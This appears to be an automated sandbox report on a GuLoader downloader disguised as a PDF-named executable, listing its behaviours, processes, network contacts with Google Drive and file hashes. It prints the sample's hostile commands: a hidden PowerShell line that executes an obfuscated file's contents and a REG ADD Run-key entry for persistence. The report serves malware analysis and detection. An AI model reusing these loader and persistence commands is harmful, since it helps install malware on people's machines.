Malware Analysis Report

2024-10-18 23:08

Sample ID 240709-ltcejaxejl
Target Vendor Data Requirements·pdf.exe
SHA256 a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
Tags
guloader downloader execution persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7

Threat Level: Known bad

The file Vendor Data Requirements·pdf.exe was found to be: Known bad.

Malicious Activity Summary

guloader downloader execution persistence

Guloader,Cloudeye

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Program crash

Enumerates physical storage devices

NSIS installer

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 09:49

Signatures

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 09:49

Reported

2024-07-09 09:51

Platform

win7-20240704-en

Max time kernel

95s

Max time network

101s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"

Signatures

Guloader,Cloudeye

downloader guloader

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A (2 identical rows)

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A (2 identical rows)

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2380 set thread context of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2488 wrote to memory of 2380 (4 identical rows) N/A C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2752 (6 identical rows) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2752 wrote to memory of 1720 (4 identical rows) N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 1912 (4 identical rows) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp

MD5 8172795f7c8cfb7cc597e879d2b0b468
SHA1 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA256 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA512 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Skyldsttendes.Und

MD5 be381f7baf52513e52dfed9361a6dc69
SHA1 a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
SHA256 caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
SHA512 c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a


Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 09:49

Reported

2024-07-09 09:51

Platform

win10v2004-20240704-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3060 -ip 3060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 2452

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t2v2wgla.tnr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp

MD5 8172795f7c8cfb7cc597e879d2b0b468
SHA1 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA256 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA512 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322
